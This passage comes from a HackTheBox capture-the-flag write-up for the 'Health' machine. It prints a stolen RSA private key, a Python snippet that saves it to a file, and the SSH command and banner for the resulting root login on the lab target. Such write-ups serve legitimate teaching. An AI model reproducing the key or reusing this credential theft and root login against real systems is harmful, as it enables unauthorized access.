J2+mOaryB2Y3aUaSKdECgYEAyZou\nfEG0e7rm3z++bZE5YFaaaOdhSNXbwuZkP4DtQzm78Jq5ErBD+a1af2hpuCt7+d1q\n0ipOCXDSsEYL9Q2i1KqPxYopmJNvWxeaHPiuPvJA5Ea5wZV8WWhuspH3657nx8ZQ\nzkbVWX3JRDh4vdFOBGB\/ImdyamXURQ72Xhr7ODkCgYAOYn6T83Y9nup4mkln0OzT\nrti41cO+WeY50nGCdzIxkpRQuF6UEKeELITNqB+2+agDBvVTcVph0Gr6pmnYcRcB\nN1ZI4E59+O3Z15VgZ\/W+o51+8PC0tXKKWDEmJOsSQb8WYkEJj09NLEoJdyxtNiTD\nSsurgFTgjeLzF8ApQNyN4QKBgGBO854QlXP2WYyVGxekpNBNDv7GakctQwrcnU9o\n++99iTbr8zXmVtLT6cOr0bVVsKgxCnLUGuuPplbnX5b1qLAHux8XXb+xzySpJcpp\nUnRnrnBfCSZdj0X3CcrsyI8bHoblSn0AgbN6z8dzYtrrPmYA4ztAR\/xkIP\/Mog1a\nvmChAoGBAKcW+e5kDO1OekLdfvqYM5sHcA2le5KKsDzzsmboGEA4ULKjwnOXqJEU\n6dDHn+VY+LXGCv24IgDN6S78PlcB5acrg6m7OwDyPvXqGrNjvTDEY94BeC\/cQbPm\nQeA60hw935eFZvx1Fn+mTaFvYZFMRMpmERTWOBZ53GTHjSZQoS3G\n-----END RSA PRIVATE KEY-----\n" id_rsa = open ('id-rsa' , 'w' ) id_rsa.write(key)
After that, just repace all the “\” with nothing. That leaves us with just the key. Lets test it out!
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 ┌──(kali㉿DESKTOP-FQ305P5)-[~/Documents/HackTheBox/Health] └─$ ssh root@10.10 .11 .176 -i id -rsa Welcome to Ubuntu 18.04 .6 LTS (GNU/Linux 4.15 .0 -191 -generic x86_64) * Documentation: https://help .ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage System information as of Tue Sep 27 19 :14 :35 UTC 2022 System load: 0.03 Processes: 180 Usage of /: 66.4 % of 3.84 GB Users logged in : 1 Memory usage: 18 % IP address for eth0: 10.10 .11 .176 Swap usage: 0 % 0 updates can be applied immediately.Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings **root@health:~
